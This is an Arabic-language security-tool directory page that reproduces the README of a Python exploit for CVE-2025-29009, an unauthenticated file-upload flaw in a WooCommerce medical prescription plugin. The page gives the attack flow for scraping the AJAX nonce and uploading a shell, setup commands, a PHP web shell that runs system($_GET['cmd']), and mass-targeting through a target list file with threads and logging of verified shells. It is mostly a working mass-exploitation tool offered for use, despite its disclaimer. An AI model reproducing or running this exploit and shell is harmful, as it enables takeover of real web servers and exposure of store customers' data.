Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/nxploited/cve-2025-29009
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالشيل كوداستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubnxploited/cve-2025-29009

CVE-2025-29009

المكوّن الإضافي WordPress Medical Prescription Attachment Plugin لـ WooCommerce الإصدار <= 1.2.3 عرضة لثغرة رفع ملفات اعتباطية بأولوية عالية.

عرض المستودع
111منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-29009

البرنامج الإضافي Medical Prescription Attachment Plugin for WooCommerce على ووردبريس الإصدار <= 1.2.3 معرّض لثغرة رفع ملفات عشوائية عالية الخطورة

CVE-2025-29009

Webkul Medical Prescription Attachment — رفع ملفات غير مقيّد → Web Shell

root@kitploit:~
,-. .   , ,--.     ,-.   ,-.  ,-.  ;--'     ,-.   ,-.   ,-.   ,-.   ,-.
/    |  /  |           ) /  /\    ) |           ) (   ) /  /\ /  /\ (   )
|    | /   |-   ---   /  | / |   /  `-.  ---   /   `-'| | / | | / |  `-'|
\    |/    |         /   \/  /  /      )      /       / \/  / \/  /     /
 `-' '     `--'     '--'  `-'  '--' `-'      '--'  `-'   `-'   `-'   `-'

CVE Plugin Auth

Python
Author

❶ الثغرة

الحقلالتفاصيل
CVECVE-2025-29009
البرنامج الإضافيWebkul Medical Prescription Attachment Plugin for WooCommerce
المتأثرجميع الإصدارات ≤ 1.2.3
المصادقةغير مطلوبة
النوعرفع ملف غير مقيّد بنوع خطير → رفع Web Shell
CWECWE-434 · رفع ملف غير مقيّد بنوع خطير

السبب الجذري:
يستقبل معالج AJAX الخاص بـ wkwcpa_handle_prescription_session (action=wkwcpa_handle_prescription_session) ملفات مرفوعة عبر wkwc_pa_prescription_attachment[] دون التحقق من امتداد الملف أو نوع MIME من جهة الخادم. يمكن لمهاجم غير مصادَق استخراج ajaxNonce من واجهة متجر WooCommerce العامة (المضمّنة في كائن JavaScript wkwcpaFrontObj)، ثم رفع Web Shell بلغة PHP مباشرة إلى دليل uploads على الخادم. ويعيد الرد الرابط الكامل القابل للوصول للملف المرفوع.


❷ مسار الهجوم

root@kitploit:~
┌──────────────────────────────────────────────────────────────┐
│  1. Resolve front page                                       │
│     GET /  →  GET /shop/  →  GET /product/  →  GET /?wkwcpa=1│
│                                                              │
│  2. Extract nonce                                            │
│     Parse wkwcpaFrontObj.ajax.ajaxUrl                        │
│     Parse wkwcpaFrontObj.ajax.ajaxNonce                      │
│                                                              │
│  3. Upload shell                                             │
│     POST <ajaxUrl>                                           │
│       action = wkwcpa_handle_prescription_session            │
│       nonce  = <ajaxNonce>                                   │
│       type   = upload                                        │
│       wkwc_pa_prescription_attachment[] = shell.php          │
│                                                              │
│  4. Parse response                                           │
│     JSON → data.attachments_img_html[].src  →  shell URL    │
│                                                              │
│  5. Verify shell                                             │
│     GET <shell_url>  →  check for unique signature           │
│                                                              │
│  6. Save to shells.txt                                       │
└──────────────────────────────────────────────────────────────┘

❸ الإعداد

root@kitploit:~
git clone https://github.com/Nxploited/CVE-2025-29009.git
cd CVE-2025-29009
pip install -r requirements.txt

requirements.txt

root@kitploit:~
requests>=2.28.0
urllib3>=1.26.0
rich>=13.0.0

❹ تحضير القشرة

أنشئ قشرة PHP خاصة بك وضمّن سلسلة توقيع فريدة حتى تتمكن الأداة من التحقق من نجاح التنفيذ:

root@kitploit:~
<?php
// NxploitedShellOK
system($_GET['cmd']);
?>

احفظها باسم shell.php في نفس دليل السكربت.
السلسلة NxploitedShellOK هي التوقيع — يجب أن تظهر في استجابة القشرة حتى ينجح التحقق.


❺ الاستخدام

root@kitploit:~
python3 CVE-2025-29009.py

الأسئلة التفاعلية

root@kitploit:~
Targets file (default list.txt):              list.txt
Threads (default 10):                         10
Local shell filename (e.g. shell.php):        shell.php
Unique shell signature (e.g. NxploitedShellOK): NxploitedShellOK

صيغة الأهداف — list.txt

root@kitploit:~
https://target1.com
target2.com
http://target3.com

الأهداف التي لا تحتوي على http:// أو https:// تُسبَق تلقائيًا بـ http://.


❻ المخرجات

الملفالمحتوى
shells.txtرابط قشرة واحد مُتحقَّق منه لكل سطر

الطرفية:

root@kitploit:~
[SHELL]  https://target.com/wp-content/uploads/2025/06/shell.php
[FAIL]   https://target2.com  (nonce_not_found)
[FAIL]   https://target3.com  (success_false)
[Status] 3/3  OK:1  FAIL:2

❼ رموز الفشل

الرمزالمعنى
shell_file_missingملف shell.php غير موجود في دليل العمل
no_front_pageلا توجد صفحة مرشّحة أعادت HTTP 200
nonce_not_foundكائن wkwcpaFrontObj غير موجود في أي صفحة
upload_errorخطأ في الشبكة أثناء POST
json_parse_errorالاستجابة ليست JSON صالحة
success_falseأعاد الخادم data.success = false
no_attachmentsنجح الرفع ولكن لا يوجد URL في الاستجابة
shell_url_not_foundتعذّر استخراج رابط الملف من HTML الاستجابة

❽ المؤلف

root@kitploit:~
Nxploited
GitHub   →  https://github.com/Nxploited
Telegram →  @KNxploited

GitHub Telegram


❾ إخلاء المسؤولية

root@kitploit:~
FOR AUTHORIZED SECURITY RESEARCH AND EDUCATION ONLY.

The author bears no responsibility for use against systems
the operator does not own or have explicit written permission to test.

Unauthorized use violates the CFAA, CMA, and equivalent laws worldwide.
You alone are responsible for your actions.

© 2025 Nxploited · Medical Prescription Attachment ≤ 1.2.3 · تم الإصلاح في 1.2.4

تنزيل الأداة